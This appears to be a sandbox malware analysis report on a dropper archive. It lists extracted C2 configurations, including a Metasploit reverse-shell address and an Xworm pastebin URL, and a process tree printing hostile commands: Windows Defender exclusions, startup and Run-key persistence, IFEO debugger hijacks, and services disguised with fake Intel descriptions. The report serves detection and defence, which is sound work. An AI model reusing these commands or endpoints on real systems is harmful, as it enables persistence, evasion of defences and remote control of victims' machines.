Analysis

  • max time kernel
    543s
  • max time network
    552s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    13-11-2024 23:56

General

  • Target

    New Text Document.exe.zip

  • Size

    1KB

  • MD5

    3cba2319d2c5bc90fb466eb45cc25912

  • SHA1

    b3c229f65df719a5c5c5dbef4c18fd0a585baa45

  • SHA256

    f1ad6740b5a1ad81cc94169c3724302d7899b5aa472ee2f2a97039715ad9b22c

  • SHA512

    756310a19fe2df65cd7092a6dc27355ee937efabdd29fe8acd3701e351a400ad088683e8a3ba1338f083d83ffe56030cf74c12d047c671c8e35ce6417078f8cb

Malware Config

Extracted

Family

vipkeylogger

Credentials

Extracted

Family

metasploit

Version

windows/reverse_tcp

C2

47.236.122.191:7900

Extracted

Family

xworm

Version

5.0

Mutex

QTumvC8IOVGR3m18

Attributes
  • install_file

    USB.exe

  • pastebin_url

    https://pastebin.com/raw/nV1XKCv3

aes.plain

Signatures

  • Detect PurpleFox Rootkit 13 IoCs

    Detect PurpleFox Rootkit.

  • Detect Xworm Payload 1 IoCs
  • Gh0st RAT payload 13 IoCs
  • Gh0strat

    Gh0st RAT is a remote access tool (RAT) with its source code public and it has been used by multiple Chinese groups.

  • Gh0strat family
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Metasploit family
  • Modifies WinLogon for persistence 2 TTPs 4 IoCs
  • PurpleFox

    PurpleFox is an exploit kit used to distribute other malware families and first seen in 2018.

  • Purplefox family
  • UAC bypass 3 TTPs 18 IoCs
  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.

  • Vipkeylogger family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 42 IoCs
  • Sets service image path in registry 2 TTPs 4 IoCs
  • Stops running service(s) 4 TTPs
  • .NET Reactor proctector 4 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • ASPack v2.12-2.42 1 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Drops startup file 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 12 IoCs
  • Indicator Removal: Clear Persistence 1 TTPs 4 IoCs

    remove IFEO.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs
  • Looks up external IP address via web service 17 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 7 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 55 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • UPX packed file 43 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 5 IoCs
  • Drops file in Windows directory 64 IoCs
  • Launches sc.exe 11 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 40 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 50 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 30 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 18 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files\7-Zip\7zFM.exe
    "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\New Text Document.exe.zip"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:2876
  • C:\Users\Admin\Desktop\New Text Document.exe
    "C:\Users\Admin\Desktop\New Text Document.exe"
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:860
    • C:\Users\Admin\Desktop\a\mk.exe
      "C:\Users\Admin\Desktop\a\mk.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1580
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zhia.lnk'); $s.TargetPath = 'C:\Users\Admin\Desktop\a\mk.exe'; $s.Save()"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2880
    • C:\Users\Admin\Desktop\a\crypted2.exe
      "C:\Users\Admin\Desktop\a\crypted2.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1568
      • C:\Users\Admin\Desktop\a\crypted2.exe
        "C:\Users\Admin\Desktop\a\crypted2.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:5044
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 1568 -s 304
        3⤵
        • Program crash
        PID:2580
    • C:\Users\Admin\Desktop\a\random.exe
      "C:\Users\Admin\Desktop\a\random.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:832
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c start cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\enters.exe"
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:2112
        • C:\Windows\system32\cmd.exe
          cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\enters.exe"
          4⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:748
          • C:\Windows\system32\PING.EXE
            ping localhost -n 1
            5⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:4268
          • C:\Users\Admin\AppData\Local\enters.exe
            C:\Users\Admin\AppData\Local\enters.exe
            5⤵
            • Executes dropped EXE
            PID:4808
    • C:\Users\Admin\Desktop\a\blhbZrtqbLg6O1K.exe
      "C:\Users\Admin\Desktop\a\blhbZrtqbLg6O1K.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:1556
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Desktop\a\blhbZrtqbLg6O1K.exe"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4636
      • C:\Users\Admin\Desktop\a\blhbZrtqbLg6O1K.exe
        "C:\Users\Admin\Desktop\a\blhbZrtqbLg6O1K.exe"
        3⤵
        • Executes dropped EXE
        • Accesses Microsoft Outlook profiles
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • outlook_office_path
        • outlook_win_path
        PID:2780
    • C:\Users\Admin\Desktop\a\Payload.exe
      "C:\Users\Admin\Desktop\a\Payload.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:5036
      • C:\Users\Admin\Desktop\a\Payload.exe
        "C:\Users\Admin\Desktop\a\Payload.exe"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1764
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "ver"
          4⤵
            PID:4864
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "ver"
            4⤵
              PID:3300
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1148
              • C:\Windows\System32\wbem\WMIC.exe
                C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
                5⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1620
      • C:\Windows\System32\rundll32.exe
        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        1⤵
          PID:892
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1568 -ip 1568
          1⤵
            PID:4732
          • C:\Users\Admin\Desktop\New Text Document.exe
            "C:\Users\Admin\Desktop\New Text Document.exe"
            1⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3352
            • C:\Users\Admin\Desktop\a\tacticalagent-v2.8.0-windows-amd64.exe
              "C:\Users\Admin\Desktop\a\tacticalagent-v2.8.0-windows-amd64.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:3120
              • C:\Users\Admin\AppData\Local\Temp\is-B0SD4.tmp\tacticalagent-v2.8.0-windows-amd64.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-B0SD4.tmp\tacticalagent-v2.8.0-windows-amd64.tmp" /SL5="$302A0,3652845,825344,C:\Users\Admin\Desktop\a\tacticalagent-v2.8.0-windows-amd64.exe"
                3⤵
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Suspicious use of WriteProcessMemory
                PID:4864
                • C:\Windows\SysWOW64\cmd.exe
                  "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrpc
                  4⤵
                  • System Network Configuration Discovery: Internet Connection Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:4568
                  • C:\Windows\SysWOW64\PING.EXE
                    ping 127.0.0.1 -n 2
                    5⤵
                    • System Location Discovery: System Language Discovery
                    • System Network Configuration Discovery: Internet Connection Discovery
                    • Runs ping.exe
                    PID:4928
                  • C:\Windows\SysWOW64\net.exe
                    net stop tacticalrpc
                    5⤵
                      PID:3764
                      • C:\Windows\SysWOW64\net1.exe
                        C:\Windows\system32\net1 stop tacticalrpc
                        6⤵
                          PID:3164
                    • C:\Windows\SysWOW64\cmd.exe
                      "cmd.exe" /c net stop tacticalagent
                      4⤵
                        PID:996
                        • C:\Windows\SysWOW64\net.exe
                          net stop tacticalagent
                          5⤵
                            PID:3272
                            • C:\Windows\SysWOW64\net1.exe
                              C:\Windows\system32\net1 stop tacticalagent
                              6⤵
                                PID:4812
                          • C:\Windows\SysWOW64\cmd.exe
                            "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrmm
                            4⤵
                            • System Network Configuration Discovery: Internet Connection Discovery
                            PID:1904
                            • C:\Windows\SysWOW64\PING.EXE
                              ping 127.0.0.1 -n 2
                              5⤵
                              • System Network Configuration Discovery: Internet Connection Discovery
                              • Runs ping.exe
                              PID:948
                            • C:\Windows\SysWOW64\net.exe
                              net stop tacticalrmm
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:2372
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop tacticalrmm
                                6⤵
                                • System Location Discovery: System Language Discovery
                                PID:1204
                          • C:\Windows\SysWOW64\cmd.exe
                            "cmd.exe" /c taskkill /F /IM tacticalrmm.exe
                            4⤵
                              PID:4788
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /F /IM tacticalrmm.exe
                                5⤵
                                • System Location Discovery: System Language Discovery
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1992
                            • C:\Windows\SysWOW64\cmd.exe
                              "cmd.exe" /c sc delete tacticalagent
                              4⤵
                                PID:4692
                                • C:\Windows\SysWOW64\sc.exe
                                  sc delete tacticalagent
                                  5⤵
                                  • Launches sc.exe
                                  • System Location Discovery: System Language Discovery
                                  PID:2816
                              • C:\Windows\SysWOW64\cmd.exe
                                "cmd.exe" /c sc delete tacticalrpc
                                4⤵
                                  PID:8
                                  • C:\Windows\SysWOW64\sc.exe
                                    sc delete tacticalrpc
                                    5⤵
                                    • Launches sc.exe
                                    PID:4380
                                • C:\Program Files\TacticalAgent\tacticalrmm.exe
                                  "C:\Program Files\TacticalAgent\tacticalrmm.exe"
                                  4⤵
                                    PID:11580
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "cmd.exe" /c tacticalrmm.exe -m installsvc
                                    4⤵
                                      PID:11740
                                      • C:\Program Files\TacticalAgent\tacticalrmm.exe
                                        tacticalrmm.exe -m installsvc
                                        5⤵
                                        • Drops file in Program Files directory
                                        PID:10704
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "cmd.exe" /c net start tacticalrmm
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:11900
                                      • C:\Windows\SysWOW64\net.exe
                                        net start tacticalrmm
                                        5⤵
                                          PID:12024
                                          • C:\Windows\SysWOW64\net1.exe
                                            C:\Windows\system32\net1 start tacticalrmm
                                            6⤵
                                              PID:3552
                                    • C:\Users\Admin\Desktop\a\UNICO-Venta3401005.exe
                                      "C:\Users\Admin\Desktop\a\UNICO-Venta3401005.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      PID:1008
                                      • C:\Archivos de programa\UNICO - Ventas\ODBC_VEN.exe
                                        "C:\Archivos de programa\UNICO - Ventas\ODBC_VEN.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • System Location Discovery: System Language Discovery
                                        • Modifies registry class
                                        PID:2444
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c ""C:\Archivos de programa\UNICO - Ventas\ODBC.cmd" "
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2560
                                    • C:\Users\Admin\Desktop\a\Autoupdate.exe
                                      "C:\Users\Admin\Desktop\a\Autoupdate.exe"
                                      2⤵
                                      • UAC bypass
                                      • Executes dropped EXE
                                      • Checks whether UAC is enabled
                                      • System policy modification
                                      PID:132
                                      • C:\Users\Admin\AppData\Roaming\icsys.ico.exe
                                        C:\Users\Admin\AppData\Roaming\icsys.ico.exe
                                        3⤵
                                        • Modifies WinLogon for persistence
                                        • UAC bypass
                                        • Executes dropped EXE
                                        • Adds Run key to start application
                                        • Checks whether UAC is enabled
                                        • Drops file in Windows directory
                                        • System policy modification
                                        PID:1992
                                    • C:\Users\Admin\Desktop\a\noloadn_OLD_New.exe
                                      "C:\Users\Admin\Desktop\a\noloadn_OLD_New.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Drops file in Windows directory
                                      PID:4112
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c ""C:\Windows\SoftwareDistribution\errchk.bat" "
                                        3⤵
                                          PID:968
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c wmic cpu get NumberOfLogicalProcessors,Version
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:1364
                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                              wmic cpu get NumberOfLogicalProcessors,Version
                                              5⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1056
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c ""C:\Windows\SoftwareDistribution\inst.bat" "
                                          3⤵
                                          • Drops file in System32 directory
                                          • Drops file in Windows directory
                                          PID:4712
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "Host-process" /f
                                            4⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:4968
                                          • C:\Windows\SysWOW64\reg.exe
                                            reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                            4⤵
                                              PID:1988
                                            • C:\Windows\SysWOW64\reg.exe
                                              Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Defender.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
                                              4⤵
                                              • Event Triggered Execution: Image File Execution Options Injection
                                              PID:4816
                                            • C:\Windows\SysWOW64\reg.exe
                                              Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winmgmnt.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
                                              4⤵
                                              • Event Triggered Execution: Image File Execution Options Injection
                                              • System Location Discovery: System Language Discovery
                                              PID:3124
                                            • C:\Windows\SysWOW64\reg.exe
                                              Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hostdl.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
                                              4⤵
                                              • Event Triggered Execution: Image File Execution Options Injection
                                              PID:4928
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im hostdl.exe /T
                                              4⤵
                                              • Kills process with taskkill
                                              PID:2252
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im renim.exe
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              • Kills process with taskkill
                                              PID:3804
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im hostdl.exe
                                              4⤵
                                              • Kills process with taskkill
                                              PID:948
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im intl.exe /T
                                              4⤵
                                              • Kills process with taskkill
                                              PID:3364
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im intl.exe
                                              4⤵
                                              • Kills process with taskkill
                                              PID:3564
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im defender.exe
                                              4⤵
                                              • Kills process with taskkill
                                              PID:2268
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im winmgmnt.exe
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              • Kills process with taskkill
                                              PID:1504
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im intelrd.exe /T
                                              4⤵
                                              • Kills process with taskkill
                                              PID:1280
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im intelrd.exe
                                              4⤵
                                              • Kills process with taskkill
                                              PID:3620
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im shaht.exe
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              • Kills process with taskkill
                                              PID:3932
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im winmgmnt.exe
                                              4⤵
                                              • Kills process with taskkill
                                              PID:2744
                                            • C:\Windows\SysWOW64\PING.EXE
                                              ping 127.0.0.1 -n 3
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              • System Network Configuration Discovery: Internet Connection Discovery
                                              • Runs ping.exe
                                              PID:2892
                                            • C:\Windows\SysWOW64\attrib.exe
                                              attrib -h -s C:\Windows\shdd\hddsmart.bat
                                              4⤵
                                              • Views/modifies file attributes
                                              PID:2044
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im hddsvc.exe
                                              4⤵
                                              • Kills process with taskkill
                                              PID:3148
                                            • C:\Windows\SoftwareDistribution\restr.exe
                                              restr.exe
                                              4⤵
                                              • Executes dropped EXE
                                              • Drops file in Windows directory
                                              PID:3316
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c ""C:\Windows\shdd\ins.bat" "
                                                5⤵
                                                  PID:2136
                                                  • C:\Windows\System32\Conhost.exe
                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    6⤵
                                                      PID:1464
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im hddsmart.exe
                                                      6⤵
                                                      • Kills process with taskkill
                                                      PID:2920
                                                    • C:\Windows\SysWOW64\PING.EXE
                                                      ping 127.0.0.1 -n 2
                                                      6⤵
                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                      • Runs ping.exe
                                                      PID:4624
                                                    • C:\Windows\instsrv.exe
                                                      C:\Windows\instsrv.exe HddSmart C:\Windows\shdd\hddsvc.exe
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:3428
                                                    • C:\Windows\SysWOW64\PING.EXE
                                                      ping 127.0.0.1 -n 2
                                                      6⤵
                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                      • Runs ping.exe
                                                      PID:1904
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      Reg Add "HKLM\SYSTEM\CurrentControlSet\services\HddSmart" /v "Description" /t REG_SZ /d "Service for determining the performance of hard disks and defragmenting the file system. SMARTHDD allows you to change the characteristics of hard and solid-state drives, changing the speed of the positioning of magnetic heads (AAM) and fine-tuning the level of energy-saving drives (APM). The system of dynamic read-write load allows to increase by 50-60." /f
                                                      6⤵
                                                        PID:2880
                                                      • C:\Windows\SysWOW64\PING.EXE
                                                        ping 127.0.0.1 -n 1
                                                        6⤵
                                                        • System Location Discovery: System Language Discovery
                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                        • Runs ping.exe
                                                        PID:4516
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        Reg Add "HKLM\SYSTEM\CurrentControlSet\services\HddSmart" /v "DisplayName" /t REG_SZ /d "Smart HDD" /f
                                                        6⤵
                                                          PID:2792
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          Reg Add "HKLM\SYSTEM\CurrentControlSet\services\HddSmart" /v "ObjectName" /t REG_SZ /d "LocalSystem" /f
                                                          6⤵
                                                            PID:2256
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            reg add "HKLM\SYSTEM\CurrentControlSet\services\HddSmart" /v "Start" /t REG_DWORD /d "2" /f
                                                            6⤵
                                                              PID:2076
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              reg add "HKLM\SYSTEM\CurrentControlSet\services\HddSmart" /v "Type" /t REG_DWORD /d "16" /f
                                                              6⤵
                                                                PID:4988
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                reg add "HKLM\SYSTEM\CurrentControlSet\services\HddSmart" /v "ErrorControl" /t REG_DWORD /d "1" /f
                                                                6⤵
                                                                  PID:2408
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  reg add "HKLM\SYSTEM\CurrentControlSet\services\HddSmart" /v "ImagePath" /t REG_EXPAND_SZ /d "C:\Windows\shdd\hddsvc.exe" /f
                                                                  6⤵
                                                                  • Sets service image path in registry
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:4768
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  Reg Add "HKLM\SYSTEM\CurrentControlSet\services\HddSmart\Parameters" /v "Application" /t REG_SZ /d "C:\Windows\shdd\hddsmart.bat" /f
                                                                  6⤵
                                                                    PID:3416
                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                    ping 127.0.0.1 -n 2
                                                                    6⤵
                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                    • Runs ping.exe
                                                                    PID:4816
                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                    sc config HddSmart DisplayName= "Smart HDD"
                                                                    6⤵
                                                                    • Launches sc.exe
                                                                    PID:3328
                                                                  • C:\Windows\SysWOW64\attrib.exe
                                                                    attrib +h +s C:\Windows\shdd\hddsmart.bat
                                                                    6⤵
                                                                    • Views/modifies file attributes
                                                                    PID:3580
                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                    sc start HddSmart
                                                                    6⤵
                                                                    • Launches sc.exe
                                                                    PID:5004
                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                ping 127.0.0.1 -n 3
                                                                4⤵
                                                                • System Location Discovery: System Language Discovery
                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                • Runs ping.exe
                                                                PID:2848
                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                ping 127.0.0.1 -n 7
                                                                4⤵
                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                • Runs ping.exe
                                                                PID:2652
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im intelrd.exe /T
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:12412
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im intelrd.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:12792
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im renim.exe /T
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:13080
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im renim.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:7404
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im shaht.exe
                                                                4⤵
                                                                • Kills process with taskkill
                                                                PID:7672
                                                              • C:\Windows\SoftwareDistribution\shaht.exe
                                                                shaht.exe
                                                                4⤵
                                                                • Executes dropped EXE
                                                                • Drops file in Windows directory
                                                                PID:5624
                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                ping 127.0.0.1 -n 3
                                                                4⤵
                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                • Runs ping.exe
                                                                PID:8208
                                                              • C:\Windows\SoftwareDistribution\instsrv.exe
                                                                instsrv.exe intelrd C:\Windows\SoftwareDistribution\intl.exe
                                                                4⤵
                                                                • Executes dropped EXE
                                                                PID:10568
                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                ping 127.0.0.1 -n 2
                                                                4⤵
                                                                • System Location Discovery: System Language Discovery
                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                • Runs ping.exe
                                                                PID:10668
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                Reg Add "HKLM\SYSTEM\CurrentControlSet\services\intelrd" /v "Description" /t REG_SZ /d "The service allows you to speed up the work of hard drives, as well as protecting against breakage and loss of data. Intel« Rapid Storage Technology offers greater levels of performance, responsiveness, and expandability than ever before. Whether you are using one or multiple serial ATA (SATA) or PCIe drives, you can take advantage of enhanced performance and lower power consumption from the latest storage technologies. Additionally, you can rest easy knowing you have added protection against data loss in the event of a hard drive failure." /f
                                                                4⤵
                                                                  PID:12120
                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                  ping 127.0.0.1 -n 1
                                                                  4⤵
                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                  • Runs ping.exe
                                                                  PID:12140
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  Reg Add "HKLM\SYSTEM\CurrentControlSet\services\intelrd" /v "DisplayName" /t REG_SZ /d "Intel Rapid Storage Technology" /f
                                                                  4⤵
                                                                    PID:10164
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    Reg Add "HKLM\SYSTEM\CurrentControlSet\services\intelrd" /v "ObjectName" /t REG_SZ /d "LocalSystem" /f
                                                                    4⤵
                                                                      PID:940
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      reg add "HKLM\SYSTEM\CurrentControlSet\services\intelrd" /v "Start" /t REG_DWORD /d "2" /f
                                                                      4⤵
                                                                        PID:412
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\SYSTEM\CurrentControlSet\services\intelrd" /v "Type" /t REG_DWORD /d "16" /f
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:3744
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\SYSTEM\CurrentControlSet\services\intelrd" /v "ErrorControl" /t REG_DWORD /d "1" /f
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:5292
                                                                      • C:\Windows\SysWOW64\reg.exe
